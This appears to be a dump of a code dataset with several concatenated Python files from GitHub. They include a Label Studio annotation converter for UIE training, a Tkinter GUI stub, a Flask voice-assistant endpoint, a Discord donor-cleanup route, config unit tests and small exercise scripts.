self.negative_ratio = negative_ratio\n self.prompt_prefix = prompt_prefix\n self.options = options\n self.separator = separator\n self.layout_analysis = layout_analysis\n self.expand_to_a4_size = expand_to_a4_size\n self.schema_lang = schema_lang\n self.ocr_lang = ocr_lang\n self.anno_type = anno_type\n self.label_studio_file = label_studio_file\n self.ignore_list = [\"属性值\", \"object\"]\n\n def process_text_tag(self, line, task_type=\"ext\"):\n items = {}\n items[\"text\"] = line[\"data\"][\"text\"]\n if task_type == \"ext\":\n items[\"entities\"] = []\n items[\"relations\"] = []\n result_list = line[\"annotations\"][0][\"result\"]\n for a in result_list:\n if a[\"type\"] == \"labels\":\n items[\"entities\"].append(\n {\n \"id\": a[\"id\"],\n \"start_offset\": a[\"value\"][\"start\"],\n \"end_offset\": a[\"value\"][\"end\"],\n \"label\": a[\"value\"][\"labels\"][0],\n }\n )\n else:\n items[\"relations\"].append(\n {\n \"id\": a[\"from_id\"] + \"-\" + a[\"to_id\"],\n \"from_id\": a[\"from_id\"],\n \"to_id\": a[\"to_id\"],\n \"type\": a[\"labels\"][0],\n }\n )\n elif task_type == \"cls\":\n items[\"label\"] = line[\"annotations\"][0][\"result\"][0][\"value\"][\"choices\"]\n return items\n\n def convert_cls_examples(self, raw_examples):\n \"\"\"\n Convert labeled data for classification task.\n \"\"\"\n examples = []\n logger.info(\"Converting annotation data...\")\n with tqdm(total=len(raw_examples)):\n for line in raw_examples:\n if self.anno_type == \"text\":\n items = self.process_text_tag(line, task_type=\"cls\")\n else:\n raise ValueError(\"The type of annotation should be text or image\")\n text, labels = items[\"text\"], items[\"label\"]\n example = self.generate_cls_example(text, labels, self.prompt_prefix, self.options)\n examples.append(example)\n return examples\n\n def convert_ext_examples(self, raw_examples, is_train=True):\n \"\"\"\n Convert labeled data for extraction task.\n \"\"\"\n\n def _sep_cls_label(label, separator):\n label_list = label.split(separator)\n if len(label_list) == 1:\n return label_list[0], None\n return label_list[0], label_list[1:]\n\n texts = []\n # {\"content\": \"\", \"result_list\": [], \"prompt\": \"X\"}\n entity_examples = []\n # {\"content\": \"\", \"result_list\": [], \"prompt\": \"X的Y\"}\n relation_examples = []\n # {\"content\": \"\", \"result_list\": [], \"prompt\": \"X的情感倾向[正向,负向]\"}\n entity_cls_examples = []\n\n # Entity label set: [\"时间\", \"地点\", ... ]\n entity_label_set = []\n # Entity name set: [\"2月8日上午\", \"北京\", ... ]\n entity_name_set = []\n # Predicate set: [\"歌手\", \"所属专辑\", ... ]\n predicate_set = []\n\n # List[List[str]]\n # List of entity prompt for each example\n entity_prompt_list = []\n # List of relation prompt for each example\n relation_prompt_list = []\n # Golden subject label for each example\n subject_golden_list = []\n # List of inverse relation for each example\n inverse_relation_list = []\n # List of predicate for each example\n predicate_list = []\n\n logger.info(\"Converting annotation data...\")\n with tqdm(total=len(raw_examples)) as pbar:\n for line in raw_examples:\n\n if self.anno_type == \"text\":\n items = self.process_text_tag(line, task_type=\"ext\")\n else:\n raise ValueError(\"The type of annotation should be text or image\")\n # print(items)\n # exit()\n text, relations, entities = items[\"text\"], items[\"relations\"], items[\"entities\"]\n texts.append(text)\n\n entity_example = []\n entity_prompt = []\n entity_example_map = {}\n entity_map = {} # id to entity name\n for entity in entities:\n entity_name = text[entity[\"start_offset\"] : entity[\"end_offset\"]]\n entity_map[entity[\"id\"]] = {\n \"name\": entity_name,\n \"start\": entity[\"start_offset\"],\n \"end\": entity[\"end_offset\"],\n }\n if entity[\"label\"] in self.ignore_list:\n continue\n\n entity_label, entity_cls_label = _sep_cls_label(entity[\"label\"], self.separator)\n\n # Define the prompt prefix for entity-level classification\n # xxx + \"的\" + 情感倾向 -> Chinese\n # Sentiment classification + \" of \" + xxx -> English\n if self.schema_lang == \"ch\":\n entity_cls_prompt_prefix = entity_name + \"的\" + self.prompt_prefix\n else:\n entity_cls_prompt_prefix = self.prompt_prefix + \" of \" + entity_name\n if entity_cls_label is not None:\n entity_cls_example = self.generate_cls_example(\n text, entity_cls_label, entity_cls_prompt_prefix, self.options)\n\n entity_cls_examples.append(entity_cls_example)\n\n result = {\"text\": entity_name, \"start\": entity[\"start_offset\"], \"end\": entity[\"end_offset\"]}\n if entity_label not in entity_example_map.keys():\n entity_example_map[entity_label] = {\n \"content\": text,\n \"result_list\": [result],\n \"prompt\": entity_label,\n }\n else:\n entity_example_map[entity_label][\"result_list\"].append(result)\n\n if entity_label not in entity_label_set and entity_label != \"观点词\":\n entity_label_set.append(entity_label)\n if entity_name not in entity_name_set:\n entity_name_set.append(entity_name)\n entity_prompt.append(entity_label)\n\n for v in entity_example_map.values():\n entity_example.append(v)\n\n entity_examples.append(entity_example)\n entity_prompt_list.append(entity_prompt)\n\n subject_golden = [] # Golden entity inputs\n relation_example = []\n relation_prompt = []\n relation_example_map = {}\n inverse_relation = []\n predicates = []\n for relation in relations:\n predicate = relation[\"type\"]\n subject_id = relation[\"from_id\"]\n object_id = relation[\"to_id\"]\n # The relation prompt is constructed as follows:\n # subject + \"的\" + predicate -> Chinese\n # predicate + \" of \" + subject -> English\n if self.schema_lang == \"ch\":\n prompt = entity_map[subject_id][\"name\"] + \"的\" + predicate\n inverse_negative = entity_map[object_id][\"name\"] + \"的\" + predicate\n else:\n prompt = predicate + \" of \" + entity_map[subject_id][\"name\"]\n inverse_negative = predicate + \" of \" + entity_map[object_id][\"name\"]\n\n if entity_map[subject_id][\"name\"] not in subject_golden:\n subject_golden.append(entity_map[subject_id][\"name\"])\n result = {\n \"text\": entity_map[object_id][\"name\"],\n \"start\": entity_map[object_id][\"start\"],\n \"end\": entity_map[object_id][\"end\"],\n }\n\n inverse_relation.append(inverse_negative)\n predicates.append(predicate)\n\n if prompt not in relation_example_map.keys():\n relation_example_map[prompt] = {\"content\": text, \"result_list\": [result], \"prompt\": prompt}\n else:\n relation_example_map[prompt][\"result_list\"].append(result)\n\n if predicate not in predicate_set:\n predicate_set.append(predicate)\n relation_prompt.append(prompt)\n\n for v in relation_example_map.values():\n relation_example.append(v)\n\n relation_examples.append(relation_example)\n relation_prompt_list.append(relation_prompt)\n subject_golden_list.append(subject_golden)\n inverse_relation_list.append(inverse_relation)\n predicate_list.append(predicates)\n pbar.update(1)\n\n logger.info(\"Adding negative samples for first stage prompt...\")\n positive_examples, negative_examples = self.add_entity_negative_example(\n entity_examples, texts, entity_prompt_list, entity_label_set\n )\n if len(positive_examples) == 0:\n all_entity_examples = []\n else:\n all_entity_examples = positive_examples + negative_examples\n\n all_relation_examples = []\n if len(predicate_set) != 0:\n logger.info(\"Adding negative samples for second stage prompt...\")\n if is_train:\n\n positive_examples = []\n negative_examples = []\n per_n_ratio = self.negative_ratio // 3\n\n with tqdm(total=len(texts)) as pbar:\n for i, text in enumerate(texts):\n negative_example = []\n collects = []\n num_positive = len(relation_examples[i])\n\n # 1. inverse_relation_list\n redundants1 = inverse_relation_list[i]\n\n # 2. entity_name_set ^ subject_golden_list[i]\n redundants2 = []\n if len(predicate_list[i]) != 0:\n nonentity_list = list(set(entity_name_set) ^ set(subject_golden_list[i]))\n nonentity_list.sort()\n\n if self.schema_lang == \"ch\":\n redundants2 = [\n nonentity + \"的\" + predicate_list[i][random.randrange(len(predicate_list[i]))]\n for nonentity in nonentity_list\n ]\n else:\n redundants2 = [\n predicate_list[i][random.randrange(len(predicate_list[i]))] + \" of \" + nonentity\n for nonentity in nonentity_list\n ]\n\n # 3. entity_label_set ^ entity_prompt_list[i]\n redundants3 = []\n if len(subject_golden_list[i]) != 0:\n non_ent_label_list = list(set(entity_label_set) ^ set(entity_prompt_list[i]))\n non_ent_label_list.sort()\n\n if self.schema_lang == \"ch\":\n redundants3 = [\n subject_golden_list[i][random.randrange(len(subject_golden_list[i]))]\n + \"的\"\n + non_ent_label\n for non_ent_label in non_ent_label_list\n ]\n else:\n redundants3 = [\n non_ent_label\n + \" of \"\n + subject_golden_list[i][random.randrange(len(subject_golden_list[i]))]\n for non_ent_label in non_ent_label_list\n ]\n\n redundants_list = [redundants1, redundants2, redundants3]\n\n for redundants in redundants_list:\n if self.anno_type == \"text\":\n added, rest = self.add_relation_negative_example(\n redundants,\n texts[i],\n num_positive,\n per_n_ratio,\n )\n negative_example.extend(added)\n collects.extend(rest)\n\n num_sup = num_positive * self.negative_ratio - len(negative_example)\n if num_sup > 0 and collects:\n if num_sup > len(collects):\n idxs = [k for k in range(len(collects))]\n else:\n idxs = random.sample(range(0, len(collects)), num_sup)\n for idx in idxs:\n negative_example.append(collects[idx])\n\n positive_examples.extend(relation_examples[i])\n negative_examples.extend(negative_example)\n pbar.update(1)\n all_relation_examples = positive_examples + negative_examples\n else:\n relation_examples = self.add_full_negative_example(\n relation_examples, texts, relation_prompt_list, predicate_set, subject_golden_list\n )\n all_relation_examples = [r for relation_example in relation_examples for r in relation_example]\n return all_entity_examples + all_relation_examples + entity_cls_examples\n\n def generate_cls_example(self, text, labels, prompt_prefix, options):\n random.shuffle(self.options)\n cls_options = \",\".join(self.options)\n prompt = prompt_prefix + \"[\" + cls_options + \"]\"\n\n result_list = []\n example = {\"content\": text, \"result_list\": result_list, \"prompt\": prompt}\n for label in labels:\n start = prompt.rfind(label) - len(prompt) - 1\n end = start + len(label)\n result = {\"text\": label, \"start\": start, \"end\": end}\n example[\"result_list\"].append(result)\n return example\n\n def add_full_negative_example(\n self, examples, texts, relation_prompt_list, predicate_set, subject_golden_list):\n with tqdm(total=len(relation_prompt_list)) as pbar:\n for i, relation_prompt in enumerate(relation_prompt_list):\n negative_sample = []\n for subject in subject_golden_list[i]:\n for predicate in predicate_set:\n # The relation prompt is constructed as follows:\n # subject + \"的\" + predicate -> Chinese\n # predicate + \" of \" + subject -> English\n if self.schema_lang == \"ch\":\n prompt = subject + \"的\" + predicate\n else:\n prompt = predicate + \" of \" + subject\n if prompt not in relation_prompt:\n negative_result = {\"content\": texts[i], \"result_list\": [], \"prompt\": prompt}\n negative_sample.append(negative_result)\n examples[i].extend(negative_sample)\n pbar.update(1)\n return examples\n\n def add_entity_negative_example(self, examples, texts, prompts, label_set):\n negative_examples = []\n positive_examples = []\n with tqdm(total=len(prompts)) as pbar:\n for i, prompt in enumerate(prompts):\n redundants = list(set(label_set) ^ set(prompt))\n redundants.sort()\n\n num_positive = len(examples[i])\n if num_positive != 0:\n actual_ratio = math.ceil(len(redundants) / num_positive)\n else:\n # Set num_positive to 1 for text without positive example\n num_positive, actual_ratio = 1, 0\n\n if actual_ratio <= self.negative_ratio or self.negative_ratio == -1:\n idxs = [k for k in range(len(redundants))]\n else:\n idxs = random.sample(range(0, len(redundants)), self.negative_ratio * num_positive)\n\n for idx in idxs:\n negative_result = {\"content\": texts[i], \"result_list\": [], \"prompt\": redundants[idx]}\n negative_examples.append(negative_result)\n positive_examples.extend(examples[i])\n pbar.update(1)\n return positive_examples, negative_examples\n\n def add_relation_negative_example(self, redundants, text, num_positive, ratio):\n added_example = []\n rest_example = []\n\n if num_positive != 0:\n actual_ratio = math.ceil(len(redundants) / num_positive)\n else:\n # Set num_positive to 1 for text without positive example\n num_positive, actual_ratio = 1, 0\n\n all_idxs = [k for k in range(len(redundants))]\n if actual_ratio <= ratio or ratio == -1:\n idxs = all_idxs\n rest_idxs = []\n else:\n idxs = random.sample(range(0, len(redundants)), ratio * num_positive)\n rest_idxs = list(set(all_idxs) ^ set(idxs))\n\n for idx in idxs:\n negative_result = {\"content\": text, \"result_list\": [], \"prompt\": redundants[idx]}\n added_example.append(negative_result)\n\n for rest_idx in rest_idxs:\n negative_result = {\"content\": text, \"result_list\": [], \"prompt\": redundants[rest_idx]}\n rest_example.append(negative_result)\n\n return added_example, rest_example","repo_name":"rongruosong/uie-lightning","sub_path":"dataconvert.py","file_name":"dataconvert.py","file_ext":"py","file_size_in_byte":20049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"13584347318","text":"import sys\n#holy shit lol\n#from mapprocessor import listofdata\nfrom tkinter import *\nselection = \"\"\n\nclass mapwindow:\n def __init__(self, master):\n self.master = master\n\n root.geometry('{}x{}'.format(500, 500))\n\n master.title(\"well i guess we're gonna use tinker\")\n\n #self.label = Label(master, text=\"This is our first GUI!\")\n #self.label.pack()\n\n #self.greet_button = Button(master, text=\"Greet\", command=self.greet)\n #self.greet_button.pack()\n\n school = StringVar(master)\n school.set(\"one\") # default value\n\n\n w = OptionMenu(master, school, \"one\", \"two\", \"three\")\n w.pack()\n\n\n self.what = Button(master, text=\"submit\", command=self.givemethetype)\n self.what.pack()\n\n self.close_button = Button(master, text=\"Close\", command=master.quit)\n self.close_button.pack()\n\n\n def greet(self):\n print(\"Greetings!\")\n\n def schools(self):\n print(\"die\")#empty lines here\n\n def givemethetype(self):\n print(\"am i retarded\")\n\n\nroot = Tk()\nmy_gui = mapwindow(root)\nroot.mainloop()\n","repo_name":"itsmerachel/hackit","sub_path":"gui.py","file_name":"gui.py","file_ext":"py","file_size_in_byte":1102,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8033134116","text":"from flask import Flask, request, jsonify\nfrom flask_cors import CORS\nimport subprocess\nfrom root import search_google, open_software, open_website\n\napp = Flask(__name__)\nCORS(app)\n\n@app.route('/process_command', methods=['POST'])\ndef process_command():\n data = request.json\n command = data.get('command')\n\n if \"open my certificate\" in command:\n filename1 = r\"C:\\Users\\kalba\\Pictures\\Screenshots\\Harvard certificate.png\"\n subprocess.Popen([filename1], shell=True)\n response = \"Opening certificate...\"\n elif \"open browser\" in command:\n open_website(\"http://www.google.com\")\n response = \"Opening browser...\"\n elif \"search\" in command:\n search_query = command.replace(\"search\", \"\").strip()\n search_google(search_query)\n response = \"Searching...\"\n elif \"open software\" in command:\n software_name = command.replace(\"open software\", \"\").strip()\n open_software(software_name)\n response = \"Opening software...\"\n else:\n response = \"Command not recognized.\"\n\n return jsonify({'response': response})\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"NeviLInit/PersonalVoiceAssistant","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"148776562","text":"# 给你三个整数a,b,c, 判断能否以它们为三个边长构成三角形。\n# 若能,输出YES,否则输出NO。\n#此处使用三角形的定律,三角形的两条边长的和大于第三条边\nL=[]\n\nfor i in range(3):\n a = input(\"请输入三角形的边\")\n L.append(a)\nL=sorted(L)\nif (L[0]+L[1]>L[2]):\n print(\"YES\")\nelse:\n print(\"NO\")","repo_name":"microease/Python-Tip-Note","sub_path":"029ok.py","file_name":"029ok.py","file_ext":"py","file_size_in_byte":361,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"11177822201","text":"import pandas as pd\nimport joblib\nfrom sklearn.base import BaseEstimator, TransformerMixin\n\ndef load_objects():\n model = joblib.load('model.pkl')\n imputer = joblib.load('impute.pkl')\n encode = joblib.load('encode.pkl')\n scale = joblib.load('scale.pkl')\n return model, imputer, encode, scale\n\n\ndef preprocess(data,impute, encode, scale):\n new_ = pd.DataFrame(data).T\n new_.columns = ['name','fuel_type', 'km_driven']\n new_['km_driven'] = impute.transform(new_[['km_driven']])\n res_encode_cat = encode.transform(new_[['name','fuel_type']])\n new_['km_driven'] = scale.transform(new_[['km_driven']])\n cat_out = pd.DataFrame(res_encode_cat, columns=encode.get_feature_names_out())\n final_preprocessed = pd.concat([cat_out,new_['km_driven']],axis =1)\n return final_preprocessed\n\n\nclass CustomTransformer(BaseEstimator, TransformerMixin):\n def __init__(self):\n print('\\n>>>>>>>init() called.\\n')\n def fit(self, X, y = None):\n print('\\n>>>>>>>fit() called.\\n')\n return self\n def transform(self, X, y = None):\n print('\\n>>>>>>>transform() called.\\n')\n print(\"\\n>>>> Input : \",X)\n X_ = X.applymap(lambda x: x.lower())\n print(\"\\n>>>> Output : \",X_)\n print(\"\\n>>>>>>> Custom Transformer Called\")\n return X_","repo_name":"nursnaaz/DataScienceMasterclass","sub_path":"09 - Variance-Bias-Pipeline/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":1305,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"3"} +{"seq_id":"40893593077","text":"import sys\nsys.stdin = open('input.txt')\n\n\nA, B = map(int, input().split())\n\n\ndef solution(A, B):\n cnt = 1\n\n while 1:\n if A > B:\n return -1\n\n if B % 2 == 0:\n B //= 2\n cnt += 1\n\n else:\n tmp = str(B)\n B = int(tmp[:-1])\n cnt += 1\n\n if B == A:\n return cnt\n\nprint(solution(A, B))","repo_name":"hksoftcorn/boj","sub_path":"백준특강/16953_atob(x)/sol1.py","file_name":"sol1.py","file_ext":"py","file_size_in_byte":385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29051656253","text":"import bottle\nimport time\nimport json\n\nfrom objects import glob\nfrom constants import exceptions\nfrom helpers import coro\n\n@bottle.route(\"/api/v1/clear_donor\", method=\"POST\")\ndef clear_donor_post():\n\tdata = {\n\t\t\"status\": 200,\n\t\t\"message\": \"ok\"\n\t}\n\ttry:\n\t\t# Get discord expired donors\n\t\texpired = glob.db.fetch_all(\"SELECT discord_roles.discordid, discord_roles.roleid, users.id FROM discord_roles RIGHT JOIN users ON users.id = discord_roles.userid WHERE users.privileges & 4 > 0 AND donor_expire <= %s\", [int(time.time())])\n\n\t\t# Do all the work if the query has returned something\n\t\tif expired is not None:\n\t\t\t# Get discord server object and make sure it's valid\n\t\t\tdiscord_server = glob.client.get_server(glob.config.config[\"discord\"][\"server_id\"])\n\t\t\tif discord_server is None:\n\t\t\t\traise exceptions.NotInServerError()\n\n\t\t\t# Get donators role object\n\t\t\tdonor_role = None\n\t\t\tfor i in discord_server.roles:\n\t\t\t\tif i.name.lower() == \"donators\":\n\t\t\t\t\tdonor_role = i\n\n\t\t\t# Make sure the donorRole is valid\n\t\t\tif donor_role is None:\n\t\t\t\tcoro.sync_coroutine(glob.client.send_message(discord_server.get_default_channel(), \"Error while cleaning expired donors! Looks like the donators role is gone! Nyo-sama where are you? :'(\"))\n\t\t\t\traise exceptions.NoRoleError()\n\n\t\t\t# Remove donators and custom roles to expired donors\n\t\t\tfor i in expired:\n\t\t\t\tprint(\"Removing donor for user {}\".format(i[\"id\"]))\n\n\t\t\t\t# First, remove donor badge\n\t\t\t\tglob.db.execute(\"DELETE FROM user_badges WHERE user = %s AND badge = '14' LIMIT 1\", [i[\"id\"]])\n\n\t\t\t\t# Then, do discord stuff\n\t\t\t\t# Make sure the discord id is valid\n\t\t\t\tif i[\"discordid\"] is None or i[\"discordid\"] == 0:\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Get the user and make sure he is still inside the server\t\n\t\t\t\tdiscord_user = discord_server.get_member(str(i[\"discordid\"]))\n\t\t\t\tif discord_user is None:\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Remove donators role\n\t\t\t\tcoro.sync_coroutine(glob.client.remove_roles(discord_user, donor_role))\n\n\t\t\t\t# Unlink discord and ripple accounts\n\t\t\t\tglob.db.execute(\"DELETE FROM discord_roles WHERE discordid = %s LIMIT 1\", [i[\"discordid\"]])\n\n\t\t\t\t# Delete profile background\n\t\t\t\tglob.db.execute(\"DELETE FROM profile_backgrounds WHERE uid = %s LIMIT 1\", [i[\"id\"]])\n\n\t\t\t\t# Get the custom role\n\t\t\t\tcustom_role = None\n\t\t\t\tfor j in discord_server.roles:\n\t\t\t\t\tif j.id == str(i[\"roleid\"]):\n\t\t\t\t\t\tcustom_role = j\n\n\t\t\t\t# Make sure the custom role is valid\n\t\t\t\tif custom_role is None:\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Delete custom role from server\n\t\t\t\tcoro.sync_coroutine(glob.client.delete_role(discord_server, custom_role))\n\n\t\t# Remove website and ingame expired donor privilege\n\t\tglob.db.execute(\"UPDATE users SET privileges = privileges & ~4 WHERE privileges & 4 > 0 AND donor_expire <= %s\", [int(time.time())])\n\texcept exceptions.InvalidSecretKeyError:\n\t\tdata[\"status\"] = 403\n\t\tdata[\"message\"] = \"Bot not in server\"\n\texcept exceptions.NoRoleError:\n\t\tdata[\"status\"] = 500\n\t\tdata[\"message\"] = \"Donators role not found\"\n\texcept:\n\t\tdata[\"status\"] = 500\n\t\tdata[\"message\"] = \"Unhandled exception\"\n\t\traise\n\tfinally:\n\t\tjson_data = json.dumps(data)\n\t\tyield json_data","repo_name":"osuripple/DonorBot","sub_path":"web/clear_donor.py","file_name":"clear_donor.py","file_ext":"py","file_size_in_byte":3077,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"36020437662","text":"import os\nimport sys\nimport unittest\nfrom argparse import ArgumentParser\nfrom copy import deepcopy\nfrom types import SimpleNamespace\nfrom typing import Dict, Optional, Union\n\nimport torchvision.models as torchmodels\nimport yaml\n\nimport automated_retraining.distribution_shifts as distribution_shifts\nimport automated_retraining.models as models\nimport automated_retraining.models.architectures as architectures\nimport automated_retraining.query_strategies as strategies\nimport automated_retraining.state_estimation as state_estimators\nfrom automated_retraining.tests.utils import validate_schema\nimport automated_retraining.model_calibration as model_calibration\n\n\nclass ConfigTester(unittest.TestCase):\n def test_config(self) -> None:\n self.assertTrue(\n test_params.config\n in [\n \"training\",\n \"active_learning_distributed\",\n \"active_learning_standalone\",\n ],\n 'Expected \"training\", \"active_learning_standalone\", or \"active_learning_distributed\"',\n )\n\n\nclass ModelConfigTester(unittest.TestCase):\n def test_schema(self) -> None:\n if not test_schema:\n return\n valid_schema = validate_schema(vars(test_params), test_key)\n self.assertTrue(valid_schema == None)\n\n def test_model_name(self) -> None:\n if not hasattr(test_params, \"model_name\"):\n return\n\n config = test_args[\"config\"]\n if config == \"training\":\n self.assertTrue(\n test_params.model_name != \"ActiveModel\", \"Did not expect ActiveModel\"\n )\n elif config == \"active_learning\":\n self.assertTrue(\n test_params.model_name in [\"ActiveModel\"], \"Expected ActiveModel\"\n )\n else:\n pass\n self.assertTrue(\n hasattr(models, test_params.model_name),\n \"model_name not defined in models folder\",\n )\n\n def test_architecture_name(self) -> None:\n if not hasattr(test_params, \"architecture\"):\n return\n self.assertTrue(\n hasattr(architectures, test_params.architecture)\n or hasattr(torchmodels, test_params.architecture),\n \"architectue not in utils/architectures folder\",\n )\n\n def test_calibration_name(self) -> None:\n if not hasattr(test_params, \"calibration\"):\n return\n self.assertTrue(\n hasattr(model_calibration, test_params.calibration),\n \"unknown calibration method\",\n )\n\n\nclass TrainingParamsTester(unittest.TestCase):\n def test_schema(self) -> None:\n if not test_schema:\n return\n valid_schema = validate_schema(vars(test_params), test_key)\n self.assertTrue(valid_schema == None)\n\n def test_batch_size(self) -> None:\n if not hasattr(test_params, \"batch_size\"):\n return\n self.assertTrue(0 < test_params.batch_size, \"Expected batch_size > 0\")\n\n def test_weight_decay(self) -> None:\n if not hasattr(test_params, \"weight_decay\"):\n return\n self.assertTrue(0 < test_params.weight_decay, \"Expected weight_decay > 0\")\n\n def test_learning_rate(self) -> None:\n if not hasattr(test_params, \"lr\"):\n return\n self.assertTrue(0 < test_params.lr, \"Expected lr > 0\")\n\n def test_gamma(self) -> None:\n if not hasattr(test_params, \"gamma\"):\n return\n self.assertTrue(0 < test_params.gamma, \"Expected gamma > 0\")\n\n def test_momentum(self) -> None:\n if not hasattr(test_params, \"momentum\"):\n return\n self.assertTrue(0 <= test_params.momentum, \"Expected momentum > 0\")\n\n\nclass TrainingConfigTester(unittest.TestCase):\n def test_schema(self) -> None:\n if not test_schema:\n return\n valid_schema = validate_schema(vars(test_params), test_key)\n self.assertTrue(valid_schema == None)\n\n def test_with_validation(self) -> None:\n if not hasattr(test_params, \"with_validation\"):\n return\n config = test_args[\"config\"]\n if config == \"active_learning\":\n self.assertTrue(\n test_params.with_validation == False,\n \"Expected with_validation to be false when active learning\",\n )\n\n def test_results_dir(self) -> None:\n if not hasattr(test_params, \"results_dir\"):\n return\n path = test_params.results_dir\n self.assertTrue(\n os.path.isdir(path),\n f\"Path {path} does not exist. Please specify full path\",\n )\n\n def test_experiment(self) -> None:\n pass\n\n def test_max_epochs(self) -> None:\n if not hasattr(test_params, \"max_epochs\"):\n return\n self.assertTrue(0 < test_params.max_epochs, \"Expected max_epochs > 0\")\n\n def test_device(self) -> None:\n if not hasattr(test_params, \"device\"):\n return\n self.assertTrue(\n test_params.device in [\"cuda\", \"cpu\"], 'Expected \"cpu\" or \"cuda\"'\n )\n\n def test_logger(self) -> None:\n if not hasattr(test_params, \"logger\"):\n return\n self.assertTrue(\n test_params.logger in [\"tensorboard\", \"csvfile\"],\n 'Expected \"tensorboard\" or \"csvfile\"',\n )\n\n\nclass DatasetConfigTester(unittest.TestCase):\n def test_schema(self) -> None:\n if not test_schema:\n return\n valid_schema = validate_schema(vars(test_params), test_key)\n self.assertTrue(valid_schema == None)\n\n def test_datamodule(self) -> None:\n pass\n\n def test_dataset_dir(self) -> None:\n if not hasattr(test_params, \"dataset_dir\"):\n return\n self.assertTrue(\n os.path.isdir(test_params.dataset_dir),\n f\"Path {test_params.dataset_dir} does not exits. Please specify full path.\",\n )\n\n def test_n_samples(self) -> None:\n pass\n\n\nclass ActiveParamsTester(unittest.TestCase):\n def test_schema(self) -> None:\n if not test_schema:\n return\n valid_schema = validate_schema(vars(test_params), test_key)\n self.assertTrue(valid_schema == None)\n\n def test_n_query(self) -> None:\n if not hasattr(test_params, \"n_query\"):\n return\n self.assertTrue(0 < test_params.n_query, \"Expected n_query > 0\")\n\n def test_n_iter(self) -> None:\n if not hasattr(test_params, \"n_iter\"):\n return\n\n def test_strategy(self) -> None:\n if not hasattr(test_params, \"strategy\"):\n return\n self.assertTrue(\n hasattr(strategies, test_params.strategy),\n \"strategy not in query_strategies\",\n )\n\n def test_state_estimator(self) -> None:\n if not hasattr(test_params, \"state_estimation_method\"):\n return\n self.assertTrue(\n hasattr(state_estimators, test_params.state_estimation_method),\n \"state estimation method not in state_estimation\",\n )\n\n def test_host(self) -> None:\n if not hasattr(test_params, \"state_estimation_host\"):\n return\n self.assertTrue(test_params.state_estimation_host in [\"edge\", \"datacenter\"])\n state_estimator = getattr(state_estimators, test_params.state_estimation_method)\n if test_params.state_estimation_host == \"edge\":\n self.assertTrue(state_estimator.supervision_level == \"un-supervised\")\n\n def test_chkpt_dir(self) -> None:\n if not hasattr(test_params, \"chkpt_dir\"):\n return\n path = test_params.chkpt_dir\n self.assertTrue(\n os.path.isdir(path),\n f\"Path {path} does not exist. Please specify full path.\",\n )\n\n\nclass SimulatorConfigTester(unittest.TestCase):\n def test_schema(self) -> None:\n if not test_schema:\n return\n valid_schema = validate_schema(vars(test_params), test_key)\n self.assertTrue(valid_schema == None)\n\n def test_n_samples(self) -> None:\n self.assertTrue(0 < test_params.n_samples, \"Expected n_samples > 0\")\n\n def test_in_distribution_file(self) -> None:\n path = test_params.in_distribution_file\n self.assertTrue(\n os.path.exists(path),\n f\"File {path} does not exist. Please specify full path.\",\n )\n\n def test_out_distribution_file(self) -> None:\n path = test_params.out_distribution_file\n self.assertTrue(\n os.path.exists(path),\n f\"File {path} does not exist. Please specify full path.\",\n )\n\n def test_method(self) -> None:\n self.assertTrue(\n hasattr(distribution_shifts, test_params.distribution_shift),\n \"method not in distribution_shifts\",\n )\n\n def test_attributes(self) -> None:\n if test_params.distribution_shift == \"HardSwitch\":\n self.assertTrue(\"n_shift\" in vars(test_params).keys())\n\n if test_params.distribution_shift == \"UniformSwitch\":\n self.assertTrue(\"n_shift\" in vars(test_params).keys())\n\n if test_params.distribution_shift == \"Static\":\n self.assertTrue(\"distribution\" in vars(test_params).keys())\n\n\ndef main(config: Optional[Union[str, Dict]]):\n param_map = {\n \"config\": ConfigTester,\n \"model_config\": ModelConfigTester,\n \"training_params\": TrainingParamsTester,\n \"training_config\": TrainingConfigTester,\n \"dataset_config\": DatasetConfigTester,\n \"active_params\": ActiveParamsTester,\n \"simulator_config\": SimulatorConfigTester,\n }\n\n global test_params, test_args, test_key, test_schema\n\n if isinstance(config, str):\n args_dict = yaml.safe_load(open(config))\n else:\n args_dict = deepcopy(config)\n\n args_dict[\"config\"] = {\"config\": args_dict[\"config\"]}\n test_args = args_dict\n tests = []\n for test_key in args_dict.keys():\n test_schema = True\n test_params = SimpleNamespace(**args_dict[test_key])\n print(\"\\n\")\n print(test_params)\n if test_key in [\"edge_config\", \"datacenter_config\"]:\n test_schema = False\n for sub_test_key in args_dict[test_key].keys():\n test_params = SimpleNamespace(**args_dict[test_key][sub_test_key])\n print(\"\\n\")\n print(test_params)\n suite = unittest.makeSuite(param_map[sub_test_key])\n tests.append(unittest.TextTestRunner(verbosity=1).run(suite))\n else:\n suite = unittest.makeSuite(param_map[test_key])\n tests.append(unittest.TextTestRunner(verbosity=1).run(suite))\n\n for test in tests:\n if not test.wasSuccessful():\n print(\n f\"Errors in config_file. Please run config file tester: tests/test_configs.py\"\n )\n sys.exit()\n return\n\n\nif __name__ == \"__main__\":\n parser = ArgumentParser()\n parser.add_argument(\n \"--config_file\",\n type=str,\n default=\"automated_retraining/tests/debug_configs/debug_mnist_al_distributed.yaml\",\n )\n args = parser.parse_args()\n main(args.config_file)\n","repo_name":"IntelLabs/automated-retraining-framework","sub_path":"automated_retraining/tests/test_configs.py","file_name":"test_configs.py","file_ext":"py","file_size_in_byte":11127,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"} +{"seq_id":"25351249375","text":"import os\nimport random\nimport tempfile\n\nimport numpy as np\nfrom tensorflow.python.keras.utils.data_utils import Sequence\nfrom 